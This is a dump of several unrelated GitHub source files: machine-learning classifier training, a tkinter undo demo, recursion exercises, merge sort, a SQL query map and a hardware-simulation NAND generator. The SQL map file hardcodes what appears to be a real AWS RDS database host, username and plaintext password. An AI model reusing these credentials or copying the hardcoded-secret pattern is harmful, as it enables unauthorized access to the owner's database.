'data/feats2_test.csv']\n","repo_name":"zle1992/atec","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"48"} +{"seq_id":"17326708048","text":"__doc__ = \"\"\"Training routines containing mixed classifier types.\n\n.. note::\n\n This file has the potential to get cluttered like the\n :mod:`mtml.modeling._vte_models` module that is now deprecated.\n\nMixed classifier training.\n\"\"\"\n\n# pylint: disable=import-error\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import (\n accuracy_score, precision_score, recall_score, roc_auc_score\n)\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\nimport sys\nfrom xgboost import XGBClassifier\n\n# pylint: disable=relative-beyond-top-level\nfrom .. import BASE_RESULTS_DIR\nfrom ... import VTE_CONT_INPUT_COLS, VTE_OUTPUT_COLS\nfrom ...data.vte import vte_slp_factory\nfrom .data_transforms import replace_hdl_tot_chol_with_ratio\nfrom ...utils.persist import persist_csv, persist_json, persist_pickle\n\n\n@persist_csv(\n target = BASE_RESULTS_DIR + \"/vte_whitened_scores.csv\",\n enabled = True, out_transform = lambda x: x[2]\n)\n@persist_json(\n target = BASE_RESULTS_DIR + \"/vte_whitened_params.json\",\n enabled = True, out_transform = lambda x: x[1]\n)\n@persist_pickle(\n target = BASE_RESULTS_DIR + \"/vte_whitened.pickle\",\n enabled = True, out_transform = lambda x: x[0]\n)\ndef fit_pca_whitened_classifiers(\n cv = 5, n_jobs = -1, verbose = False, report = False, random_seed = None\n):\n \"\"\"Fit classifiers to [non-]undersampled PCA-whitened input data.\n \n .. note:: Spits a lot of ``liblinear`` convergence warnings.\n\n We start with the top 7 columns by univariate ROC AUC for the VTE data.\n We perform a whitening PCA transform of the data and then fit classifiers\n with balanced class weights. Formerly oversampling of the minority class\n was done with the use of a :class:`sklearn.model_selection.PredefinedSplit`\n to prevent the oversampled data from leaking into the validation sets\n during the grid search (all oversampled data appended to end of training\n set and now allowed to be part of validation sets), but the improvement was\n not as much as one would have hoped (actually worse). 
So we ended up going\n back to just using balanced class weights.\n\n Use 5-fold (by default) cross-validation to choose the best parameters,\n refit on best, evaluate accuracy, precision, recall, ROC AUC.\n\n Note that we need a scaler before doing PCA. Use F1 score to pick model.\n\n :param cv: Number of CV splits to make when doing grid search.\n :type cv: int, optional\n :param n_jobs: Number of jobs to run in parallel when grid searching.\n Defaults to ``-1`` to distribute load to all threads.\n :type n_jobs: int, optional\n :param verbose: Verbosity of the\n :class:`~sklearn.model_selection.GridSearchCV` during searching/fitting.\n :type verbose: bool, optional\n :param report: If ``True``, print to stdout a report on model scores.\n :type report: bool, optional\n :param random_seed: A int seed to pass for multiple calls to this function\n to be reproducible. Leave ``None`` for stochastic behavior.\n :type random_state: int, optional\n :rtype: tuple\n \"\"\"\n if cv < 3:\n raise ValueError(\"cv folds must be 3 or more\")\n # use only the top seven columns selected by univariate AUC\n best_cols = list(\n pd.read_csv(\n BASE_RESULTS_DIR + \"/vte_selected_cols.csv\", index_col = 0\n ).index\n )\n # get data set of continuous features from vte_slp_factory\n X_train, X_test, y_train, y_test = vte_slp_factory(\n data_transform = replace_hdl_tot_chol_with_ratio,\n inputs = best_cols, targets = VTE_OUTPUT_COLS, dropna = True,\n random_state = random_seed\n )\n # fit StandardScaler and use to transform data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train, X_test = scaler.transform(X_train), scaler.transform(X_test)\n # fit PCA and transform data yet again (whiten)\n pca = PCA(whiten = True, random_state = random_seed)\n pca.fit(X_train)\n X_train, X_test = pca.transform(X_train), pca.transform(X_test)\n # list of base estimator names for use in Pipeline and parameter naming\n base_names = (\n \"l2_logistic\", \"l2_linsvc\", \"bagged_l2_logistic\", \"bagged_l2_linsvc\",\n \"rbf_svc\", \"xgboost\", \"random_forest\"\n )\n ## hyperparameter grids for each model ##\n # note that intercepts are not fitted since data are centered + scaled.\n # l2-regularized logistic regression (baseline model)\n lrc_l2_grid = dict(\n penalty = [\"l2\"],\n C = [1],\n fit_intercept = [True],\n max_iter = [100],\n class_weight = [\"balanced\"]\n )\n # linear SVM with l2 penalty (baseline model)\n lsvc_l2_grid = dict(\n penalty = [\"l2\"],\n loss = [\"hinge\", \"squared_hinge\"],\n dual = [True],\n random_state = [random_seed],\n C = [1, 5, 10],\n fit_intercept = [True],\n class_weight = [\"balanced\"]\n )\n # bagged logistic regression model with l2 penalty\n bag_lrc_l2_grid = dict(\n base_estimator = [\n LogisticRegression(fit_intercept = True, class_weight = \"balanced\")\n ],\n n_estimators = [100, 200, 400],\n random_state = [random_seed]\n )\n # bagged linear SVM with l2 penalty (use default parameters + hinge loss)\n bag_lsvc_l2_grid = dict(\n base_estimator = [\n LinearSVC(loss = \"hinge\", fit_intercept = True,\n class_weight = \"balanced\", random_state = random_seed)\n ],\n n_estimators = [100, 200, 400],\n random_state = [random_seed]\n )\n # RBF support vector classifier\n rbf_svc_grid = dict(\n C = [0.1, 1, 5],\n kernel = [\"rbf\"],\n gamma = [\"scale\", \"auto\"],\n class_weight = [\"balanced\"]\n )\n # compute ratio of 0 instances to 1 instances to get XGBoost\n # scale_pos_weight parameter (use training data only! 
don't be biased)\n neg_pos_ratio = (y_train == 0).sum() / (y_train == 1).sum()\n # XGBoost classifier\n xgb_grid = dict(\n max_depth = [3],\n n_estimators = [400, 600, 800],\n learning_rate = [0.1],\n booster = [\"gbtree\"],\n subsample = [0.5],\n reg_lambda = [0.1, 1],\n random_state = [random_seed],\n scale_pos_weight = [neg_pos_ratio]\n )\n # random forest classifier. note that according to ESL II, full trees are\n # fine to grow and allow you to have one less tuning parameter, but it's\n # still better to limit the overall tree depth.\n rf_grid = dict(\n max_depth = [6, 12, 24],\n n_estimators = [100, 200, 400],\n criterion = [\"entropy\"],\n random_state = [random_seed],\n class_weight = [\"balanced\"]\n )\n # models to use in our grid searches\n base_models = (\n LogisticRegression(), LinearSVC(), BaggingClassifier(),\n BaggingClassifier(), SVC(), XGBClassifier(), RandomForestClassifier()\n )\n base_names = (\n \"l2_logistic\", \"l2_linsvc\", \"bagged_l2_logistic\", \"bagged_l2_linsvc\",\n \"rbf_svc\", \"xgboost\", \"random_forest\"\n )\n # grid search parameters for all the models\n param_grids = (\n lrc_l2_grid, lsvc_l2_grid, bag_lrc_l2_grid, bag_lsvc_l2_grid,\n rbf_svc_grid, xgb_grid, rf_grid\n )\n # dictionary to hold saved model results for VTE classification problem.\n mdata = {}\n # dictionary to hold saved model hyperparameters for plaintext persistence.\n mparams = {}\n # DataFrame indexed by name of the model where columns are accuracy,\n # precision, and recall for each model\n mscores = pd.DataFrame(\n index = base_names, \n columns = [\"accuracy\", \"precision\", \"recall\", \"roc_auc\"]\n )\n # for each model, train + record results into mdata, mparams, and mscores\n for base_name, base_model, param_grid, in zip(\n base_names, base_models, param_grids):\n # instantiate and fit the GridSearchCV object. may spit mad warnings.\n model = GridSearchCV(\n base_model, param_grid, scoring = \"f1\", cv = cv,\n n_jobs = n_jobs, verbose = int(verbose)\n )\n # fit\n model.fit(X_train, y_train)\n # save model to mdata using model name\n mdata[base_name] = model\n # get hyperparameters of the best estimated model\n params = model.best_estimator_.get_params()\n # if there are any predictors as a parameter, replace them with their\n # parameters from get_params (for ensemble models)\n for name in params.keys():\n if hasattr(params[name], \"get_params\"):\n params[name] = params[name].get_params()\n # save hyperparameters to mparams\n mparams[base_name] = params\n # compute test predictions using refit model on X_test\n y_pred = model.predict(X_test)\n # get decision function values for computing ROC AUC. 
if it isn't\n # present, try the predict_proba method\n if hasattr(model, \"decision_function\"): \n y_pred_scores = model.decision_function(X_test)\n elif hasattr(model, \"predict_proba\"):\n # we only want probabilities for the greater class\n y_pred_scores = model.predict_proba(X_test)[:, 1]\n else:\n print(\n f\"warning: {model.__class__.__name__} can't compute ROC AUC \"\n \"score; does not have decision_function or predict_proba\",\n file = sys.stderr\n )\n y_pred_scores = None\n # save accuracy, precision, and recall to in mscores\n mscores.loc[base_name, :] = (\n accuracy_score(y_test, y_pred), precision_score(y_test, y_pred),\n recall_score(y_test, y_pred),\n np.nan if y_pred_scores is None else roc_auc_score(\n y_test, y_pred_scores\n )\n )\n # if report is True, print mscores to stdout\n if report:\n print(\"---- classifier quality metrics \", end = \"\")\n print(\"-\" * 48, end = \"\\n\\n\")\n print(mscores)\n # return results that can get picked up by decorators\n return mdata, mparams, mscores\n\n\nif __name__ == \"__main__\":\n # fit_pca_whitened_classifiers(report = True, random_seed = 7)\n pass","repo_name":"crb479/mcdevitt-trauma-ml","sub_path":"mtml/modeling/vte/mixed_models.py","file_name":"mixed_models.py","file_ext":"py","file_size_in_byte":10376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"30974689357","text":"#设置撤销功能\nfrom tkinter import *\nimport hashlib #---想要获得md5的值需要调用的必须\nroot = Tk()\n\ntext = Text(root,width=30,height=5,undo=True,autoseparators=False)#------在这里必须打开他的undo 默认为False\n #_-有一个自以为是的做法就是他默认这句话是没有结束的 一次撤销所有的输入就都没了\n #-在这里可以设置他的autoseparators=Fslse\ntext.pack()\ntext.insert(INSERT,\"王者荣耀之上官婉儿132465464王王王王\")\ndef callback(event):\n text.edit_separator()\n\ntext.bind('',callback)#----定义每当有一个按键输入 就插入一个分隔符 也就是说每次输入 都算一个栈\ndef show():\n text.edit_undo()#------如果点击这个按钮 则撤销操作\nButton(root,text=\"撤销\",command=show).pack()\n\n\n\n\nmainloop()","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/爬虫的自我修养/gui的最终选择 tkinter/Text超级组件/撤销操作.py","file_name":"撤销操作.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27709494791","text":"from bim2sim.task.base import ITask\nfrom bim2sim.utilities.common_functions import filter_instances\nfrom bim2sim.workflow import Workflow\n\n\nclass BindStoreys(ITask):\n reads = ('instances', )\n touches = ('instances', )\n\n def run(self, workflow: Workflow, instances: dict):\n \"\"\"Bind thermal_zones and instances to each floor/storey and vice\n versa\"\"\"\n self.logger.info(\"Binding bim2sim instances to storeys\")\n storeys = filter_instances(instances, 'Storey')\n for storey in storeys:\n storey_instances = []\n for ifc_structure in storey.ifc.ContainsElements:\n for ifc_element in ifc_structure.RelatedElements:\n instance = instances.get(ifc_element.GlobalId, None)\n if instance:\n storey_instances.append(instance)\n if storey not in instance.storeys:\n instance.storeys.append(storey)\n\n storey_spaces = []\n for ifc_aggregates in storey.ifc.IsDecomposedBy:\n for ifc_element in ifc_aggregates.RelatedObjects:\n instance = instances.get(ifc_element.GlobalId, None)\n if instance:\n storey_spaces.append(instance)\n if storey not in instance.storeys:\n instance.storeys.append(storey)\n\n storey.storey_instances = storey_instances\n storey.thermal_zones = storey_spaces\n return 
instances,\n","repo_name":"BIM2SIM/bim2sim","sub_path":"bim2sim/task/common/bind_storeys.py","file_name":"bind_storeys.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"13510972781","text":"def factorial(n):\r\n    if n<1:\r\n        return 1\r\n    else:\r\n        e=n*factorial(n-1)\r\n        return e\r\n\r\nr=factorial(4)\r\ndef fibonacci(n):\r\n    assert n>=0 and int(n)==n,'fibonacci number cannot be negative or a non-integer'\r\n    try:\r\n        if n in [0,1]:\r\n            return n\r\n\r\n        else:\r\n            return fibonacci(n-1)+fibonacci(n-2)\r\n    except Exception as e:\r\n        print(e)\r\n\r\n\r\nprint(fibonacci(5))\r\nprint(40%6)\r\n\r\ndef sum_digit(n):\r\n    assert n>=0 and type(n)==int,"only integer"\r\n    if n==0:\r\n        return 0\r\n\r\n    else:\r\n\r\n        return int(n%10) + sum_digit(int(n/10))\r\n\r\n\r\nprint(sum_digit(112))\r\n\r\ndef power(base,exp):\r\n    assert exp>=0 and int(exp)==exp\r\n    if exp==0:\r\n        return 1\r\n    if exp==1:\r\n        return base\r\n    return base*power(base,exp-1)\r\n\r\nprint(power(2,4))\r\ndef gcd(a,b):\r\n    if b==0:\r\n        return a\r\n    else:\r\n        return gcd(b,a%b)\r\n\r\nprint(gcd(48,64))\r\n\r\n\r\ndef decimaltobinary(n):\r\n    if n==0:\r\n        return 0\r\n\r\n    else:\r\n        return n%2+10*decimaltobinary(int(n/2))\r\nprint(decimaltobinary(10))\r\n\r\ndef reverse(string):\r\n    if len(string)<=1:\r\n        return string\r\n\r\n    return string[len(string)-1] + reverse(string[0:len(string)-1])\r\n\r\nprint(reverse(\"python\"))\r\n\r\ndef recursiveRange(num):\r\n    if num <=0:\r\n        return 0\r\n\r\n    return num + recursiveRange(num-1)\r\n\r\n\r\nprint(recursiveRange(6))\r\n\r\n\r\ndef productofarray(arr):\r\n    if len(arr)==0:\r\n        return 1\r\n\r\n\r\n    return arr[0]*productofarray(arr[1:])\r\n\r\n\r\nprint(productofarray([1,2,3]))\r\n\r\n\r\ndef power(base,exponent):\r\n    if exponent==0:\r\n        return 1\r\n\r\n\r\n    return base*power(base,exponent-1)\r\n\r\nprint(power(2,0))\r\n\r\ndef ispallindrome(strng):\r\n    if len(strng)==0:\r\n        return True\r\n\r\n    if strng[0] != strng[len(strng)-1]:\r\n        return False\r\n\r\n\r\n    return ispallindrome(strng[1:-1])\r\n\r\n\r\nprint(ispallindrome('tacocat'))\r\n\r\n\r\ndef capitalizefirst(arr):\r\n    result=[]\r\n    if len(arr)==0:\r\n        return result\r\n    result.append(arr[0][0].upper() + arr[0][1:])\r\n    return result+capitalizefirst(arr[1:])\r\n\r\nprint(capitalizefirst(['car', 'taco', 'banana']))\r\n\r\ndef capitalizewords(arr):\r\n    result =[]\r\n    if len(arr)==0:\r\n        return result\r\n\r\n    result.append(arr[0].upper())\r\n    return result + capitalizewords(arr[1:])\r\n\r\nwords = ['i', 'am', 'learning', 'recursion']\r\n\r\nprint(capitalizewords(words))\r\n\r\n\r\ndef stringifyNumbers(obj):\r\n    newobj=obj\r\n    for key in newobj:\r\n        if type(newobj[key]) is int :\r\n            newobj[key]=str(newobj[key])\r\n        if type(newobj[key]) is dict:\r\n            newobj[key]=stringifyNumbers(newobj[key])  # recurse so numbers inside nested dicts are converted too\r\n\r\n    return newobj\r\n\r\nobj = {\r\n    \"num\": 1,\r\n    \"test\": [],\r\n    \"data\": {\r\n        \"val\": 4,\r\n        \"info\": {\r\n            \"isRight\": True,\r\n            \"random\": 66\r\n        }\r\n    }\r\n}\r\n\r\nprint(stringifyNumbers(obj))\r\n","repo_name":"Saketkr06/Data-Structures-and-Algorithms-in-python","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4952931383","text":"import json\nfrom jsonref import replace_refs\nfrom openapi_schema_to_json_schema import to_json_schema\n\njson_file = open('docs.json','r')\n\nopenapi_schema = 
json.load(json_file)\n\noptions = {"supportPatternProperties": True}\nconverted = to_json_schema(openapi_schema, options)\ntry:\n    converted2 = replace_refs(converted)\nexcept Exception as exp:\n    print(exp)\n    converted2 = converted  # fall back to the unresolved schema so converted2 is always defined\n\nprint(json.dumps(converted2, indent=2))\n","repo_name":"teralin01/elle_web","sub_path":"doc/json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38028991150","text":"import time\nimport random\n\ndef intercalate(array, start, middle, end):\n    global inversoes\n    global total, l\n    beginning = start\n    j = middle + 1\n    final_array = []\n    while(start <= middle and j <= end):\n        if(array[start] < array[j]):\n            final_array.append(array[start])\n            start += 1\n        else:\n            final_array.append(array[j])\n            j += 1\n    while( start <= middle):\n        final_array.append(array[start])\n        start += 1\n\n    while(j <= end):\n\n        final_array.append(array[j])\n        j += 1\n\n    # w = 0\n    # for i in range(start, n+1):\n    #     array[i] = final_array[w]\n    #     w += 1\n    array[beginning:end+1] = final_array\n\n\n\ndef mergeSortRec(array, i, j):\n    if(i == j): return\n    k = int((i+j)/2)\n    mergeSortRec(array, i, k)\n    mergeSortRec(array, k+1, j)\n    intercalate(array, i, k, j)\n    # intercalate(intercalate(i, 0, len(i)//2, len(i)-1), intercalate(k+1, 0, len(k+1)//2, len(k+1)-1)) \n\n\n# array = [random.randint(1,100000000) for _ in range(100000000)]\n\n# start_time = time.clock()\narray = [5,2,7,0,1,4]\nmergeSortRec(array, 0, len(array)-1)\n# array.sort()\n\n# print(time.clock() - start_time, \"seconds\")\nprint(array)\n\n","repo_name":"douglasgondim/University","sub_path":"Construction and Analysis of Algorithms/codes/mergesortRec.py","file_name":"mergesortRec.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2785202957","text":"#First Approach\n'''from collections import defaultdict\n\ncnt = defaultdict(lambda : 0)\nfor _ in range(int(input())):\n    a,b = list(map(int,input().split()))\n    for i in range(a,b+1):\n        cnt[i] += 1\n\nprint(max(cnt.values()))'''\n\n#Optimal Approach\narrival = []\nleave = []\nn = int(input())\nfor _ in range(n):\n    a,b = list(map(int,input().split()))\n    arrival.append(a)\n    leave.append(b)\n\narrival.sort()\nleave.sort()\ni,j = 0,0\ncurr = 0\nma = 0\n# sweep the sorted arrival/leave times, tracking how many customers are present\nwhile i < n:\n    if arrival[i] < leave[j]:\n        curr += 1\n        i += 1\n    else:\n        curr -= 1\n        j += 1\n    if curr > ma:\n        ma = curr\nprint(ma)\n \n\n\n\n\n\n\n\n\n\n","repo_name":"pradyutnathradhae/interview_Program","sub_path":"mixed_problems/restaurantcustomers.py","file_name":"restaurantcustomers.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28776870590","text":"'''\r\nCreated on 2015. 5. 
14.\r\n\r\n@author: Jay\r\n'''\r\n\r\n\r\nclass sqlMap:\r\n \r\n connectInfo = (\"kirudadb.c5rq93advanj.us-west-2.rds.amazonaws.com\", \"admin\",\r\n \"1qaz2wsx\", \"kirudaDB\")\r\n \r\n selectStockInfo = \" \\\r\n SELECT \\\r\n A.CODE, A.XPATH, A.ARRAYNUM, B.URL1, B.URL2, A.DATANAME, A.SITECODE \\\r\n FROM \\\r\n (SELECT \\\r\n XPATH, ARRAYNUM, SITECODE, CODE, DATANAME, YN\\\r\n FROM \\\r\n SITE_DATA) A, \\\r\n (SELECT \\\r\n URL1, URL2, CODE \\\r\n FROM \\\r\n SITE_INFO) B \\\r\n WHERE \\\r\n A.SITECODE = B.CODE\\\r\n AND A.YN = 'Y'\"\r\n\r\n SELECTSITEDATA_XPATH = \"\\\r\n SELECT \\\r\n DISTINCT(XPATH) \\\r\n FROM \\\r\n SITE_DATA \\\r\n WHERE \\\r\n YN = 'Y' \\\r\n AND DATATYPE = '%s'\"\r\n \r\n SELECTPARSEINGINFO = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = '%s'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n SELECTTRADERINFO_XPATH = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = 'xpath_da_trader01'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n SELECTFRGNINFO_XPATH = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = 'xpath_na_frgn01'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n selectSiteDataDaily = \" \\\r\n SELECT \\\r\n A.CODE, A.XPATH, A.ARRAYNUM, B.URL1, B.URL2, A.DATANAME, A.SITECODE \\\r\n FROM \\\r\n (SELECT \\\r\n XPATH, ARRAYNUM, SITECODE, CODE, DATANAME, YN, DATATYPE\\\r\n FROM \\\r\n SITE_DATA) A, \\\r\n (SELECT \\\r\n URL1, URL2, CODE \\\r\n FROM \\\r\n SITE_INFO) B \\\r\n WHERE \\\r\n A.SITECODE = B.CODE\\\r\n AND A.YN = 'Y'\\\r\n AND A.DATATYPE IN ('D')\" \r\n \r\n insertStockData = \" \\\r\n INSERT INTO \\\r\n %s ( %s ) \\\r\n VALUES \\\r\n ( %s )\"\r\n \r\n insertStockSisaeData = \" \\\r\n INSERT INTO \\\r\n STOCK_SISAE ( %s ) \\\r\n VALUES \\\r\n ( %s ) \\\r\n ON DUPLICATE KEY UPDATE \\\r\n LOANDONE = IF(VALUES(LOANDONE) IS NOT NULL,VALUES(LOANDONE),LOANDONE), \\\r\n LOANCLEAN = IF(VALUES(LOANCLEAN) IS NOT NULL,VALUES(LOANCLEAN),LOANCLEAN), \\\r\n LOANBALANCEVOL = IF(VALUES(LOANBALANCEVOL) IS NOT NULL,VALUES(LOANBALANCEVOL),LOANBALANCEVOL), \\\r\n LOANBALANCENTL = IF(VALUES(LOANBALANCENTL) IS NOT NULL,VALUES(LOANBALANCENTL),LOANBALANCENTL), \\\r\n SHORTVOLUMERATIO = IF(VALUES(SHORTVOLUMERATIO) IS NOT NULL,VALUES(SHORTVOLUMERATIO),SHORTVOLUMERATIO), \\\r\n SHORTVOLUME = IF(VALUES(SHORTVOLUME) IS NOT NULL,VALUES(SHORTVOLUME),SHORTVOLUME), \\\r\n SHORTNOTIONAL = IF(VALUES(SHORTNOTIONAL) IS NOT NULL,VALUES(SHORTNOTIONAL),SHORTNOTIONAL)\"\r\n \r\n INSERTDATAWITHOUTPARENTHESES = \"\\\r\n INSERT INTO \\\r\n %s %s \\\r\n VALUES \\\r\n %s \"\r\n \r\n selectStockCode = \" \\\r\n SELECT \\\r\n CODE, TICKER, MARKET \\\r\n FROM \\\r\n STOCK_INFO \"\r\n \r\n selectDataInfo = \" \\\r\n SELECT \\\r\n CODE, UNIT, CCY_CD \\\r\n FROM \\\r\n DATA_INFO \\\r\n WHERE \\\r\n SITECODE = '%s' \\\r\n AND CODE = '%s' \"\r\n \r\n selectXpathInfo = \"\\\r\n SELECT \\\r\n XPATH \\\r\n FROM \\\r\n XPATH_INFO \\\r\n WHERE \\\r\n CODE = '%s' \"\r\n \r\n INSERTSTOCKLIST = \" \\\r\n INSERT INTO\\\r\n STOCK_INFO\\\r\n 
(CODE, TICKER, MARKET, CREATE_DATE) \\\r\n VALUES \\\r\n %s \\\r\n ON DUPLICATE KEY UPDATE \\\r\n CODE = VALUES(CODE), \\\r\n TICKER = VALUES(TICKER), \\\r\n MARKET = VALUES(MARKET), \\\r\n mod_date = NOW() \"\r\n \r\n INSERTFRGNDATA = \" \\\r\n INSERT INTO \\\r\n STOCK_SISAE \\\r\n (CODE, DATE, NETVOLUME_INSTITUTION, NETVOLUME_FOREIGN, foreignHoldingStock, FOREIGNSTOCKHOLDINGPERCENT) \\\r\n VALUES \\\r\n %s \\\r\n ON DUPLICATE KEY UPDATE \\\r\n NETVOLUME_INSTITUTION = VALUES(NETVOLUME_INSTITUTION), \\\r\n NETVOLUME_FOREIGN = VALUES(NETVOLUME_FOREIGN), \\\r\n foreignHoldingStock = VALUES(foreignHoldingStock), \\\r\n FOREIGNSTOCKHOLDINGPERCENT = VALUES(FOREIGNSTOCKHOLDINGPERCENT)\"\r\n \r\n SELECTTRADERINFO = \"\\\r\n SELECT \\\r\n * \\\r\n FROM \\\r\n TRADER_INFO\"\r\n \r\n SELECTHISTORICALSTOCKPRICES = \"\\\r\n SELECT \\\r\n date, currentPrice \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND (%s) \"\r\n \r\n SELECTHISTORICALSTOCKSISAE = \"\\\r\n SELECT \\\r\n * \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND (%s) \"\r\n \r\n SELECTHISTORICALSTOCKPRICES2 = \"\\\r\n CALL PC_SLT_HISTSTOCKPRICE %s\"\r\n \r\n SELECTHISTSTOCKSISAE = \"\\\r\n CALL PC_SLT_HISTSTOCKSISAE %s\"\r\n \r\n SELECTTRAININGDATA = \"\\\r\n SELECT \\\r\n IFNULL(CURRENTPRICE, 0) \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND date = '%s'\" ","repo_name":"quantosauros/KirudaEngine","sub_path":"kirudaEngine/util/DB/sqlMap.py","file_name":"sqlMap.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70893269585","text":"from part import Part, PartFactory\n\nimport util\n\nclass Nand(PartFactory):\n\n ''' A generic N-input NAND component '''\n\n def __init__(self, ident, inputs, delay, invert):\n super().__init__(ident)\n self.inputs = inputs\n self.scm = False\n self.comp = None\n self.delay = delay\n self.invert = invert\n\n def state(self, file):\n ''' Extra state variable '''\n\n file.write(\"\\tint job;\\n\")\n file.write(\"\\tint out;\\n\")\n file.write(\"\\tunsigned dly;\\n\")\n\n def init(self, file):\n ''' Extra initialization '''\n\n file.write(\"\\tstate->dly = %d;\\n\" % self.delay)\n\n file.fmt('''\n\t\t|\tstate->out = -1;\n\t\t|\tstate->job = 0;\n\t\t|\tif (strstr(this->name(), \"IOC.ioc_54.RDNAN0A\") != NULL) {\n\t\t|\t\t// TEST_MACRO_EVENT_SLICE.IOC @ optimized\n\t\t|\t\tstate->dly = 10;\n\t\t|\t}\n\t\t|\tif (strstr(this->name(), \"IOC.ioc_54.RDNAN0B\") != NULL) {\n\t\t|\t\t// TEST_MACRO_EVENT_DELAY.IOC @ optimized\n\t\t|\t\tstate->dly = 10;\n\t\t|\t}\n\t\t|\tif (strstr(this->name(), \"TYP.typ_40.CKDR5A\") != NULL) {\n\t\t|\t\t// TEST_LOOP_CNTR_OVERFLOW.TYP @ main\n\t\t|\t\tstate->dly = 2;\n\t\t|\t}\n\t\t|''')\n\n def sensitive(self):\n ''' sensitivity list '''\n\n for i in range(self.inputs):\n yield \"PIN_D%d\" % i\n\n def doit(self, file):\n ''' The meat of the doit() function '''\n\n super().doit(file)\n\n file.write(\"\\tconst int active = %d;\\n\" % (not self.invert))\n\n file.fmt('''\n\t\t|\n\t\t|\tTRACE(\n\t\t|\t << \" j \" << state->job\n\t\t|\t << \" out \" << state->out\n\t\t|\t << \" in \"\n\t\t|''')\n\n for i in range(self.inputs):\n file.write(\"\\t << PIN_D%d\\n\" % i)\n\n file.fmt('''\n\t\t|\t);\n\t\t|\n\t\t|\tif (state->job) {\n\t\t|\t\tPIN_Q<=(state->out);\n\t\t|\t\tstate->job = false;\n\t\t|\t}\n\t\t|\n\t\t|''')\n\n file.write(\"\\n\\tif (\\n\\t \")\n\n i = []\n for node in self.comp:\n if node.pin.name != \"Q\":\n 
i.append(\"PIN_%s=>\" % node.pin.name)\n file.fmt(\" &&\\n\\t \".join(i))\n\n file.fmt('''\n\t\t|\n\t\t|\t) {\n\t\t|\t\tif (state->out != active) {\n\t\t|\t\t\tstate->out = active;\n\t\t|\t\t\tif (state->dly == 0) {\n\t\t|\t\t\t\tPIN_Q<=(state->out);\n\t\t|\t\t\t} else {\n\t\t|\t\t\t\tstate->job = true;\n\t\t|\t\t\t\tnext_trigger(state->dly, SC_NS);\n\t\t|\t\t\t}\n\t\t|\t\t}\n\t\t|\t} else {\n\t\t|\t\tif (state->out != !active) {\n\t\t|\t\t\tstate->out = !active;\n\t\t|\t\t\tif (state->dly == 0) {\n\t\t|\t\t\t\tPIN_Q<=(state->out);\n\t\t|\t\t\t} else {\n\t\t|\t\t\t\tstate->job = true;\n\t\t|\t\t\t\tnext_trigger(state->dly, SC_NS);\n\t\t|\t\t\t}\n\t\t|''')\n\n if self.inputs > 1:\n for node in self.comp:\n if node.pin.name != \"Q\":\n file.fmt(\"\\t\\t} else if (!PIN_%s=>) {\\n\" % node.pin.name)\n file.fmt(\"\\t\\t\\tnext_trigger(PIN_%s.default_event());\\n\" % node.pin.name)\n\n file.fmt('''\n\t\t|\t\t}\n\t\t|\t}\n\t\t|''')\n\n def hookup(self, file, comp):\n pno = 0\n for node in comp:\n if node.pin.name == \"Q\":\n file.write(\"\\t%s.PIN_Q(%s);\\n\" % (comp.name, node.net.cname))\n else:\n file.write(\"\\t%s.PIN_D%d(%s);\\n\" % (comp.name, pno, node.net.cname))\n pno += 1\n\nclass ModelNand(Part):\n ''' Model NAND components '''\n\n def __init__(self, delay, invert):\n super().__init__(\"NAND\")\n self.delay = delay\n 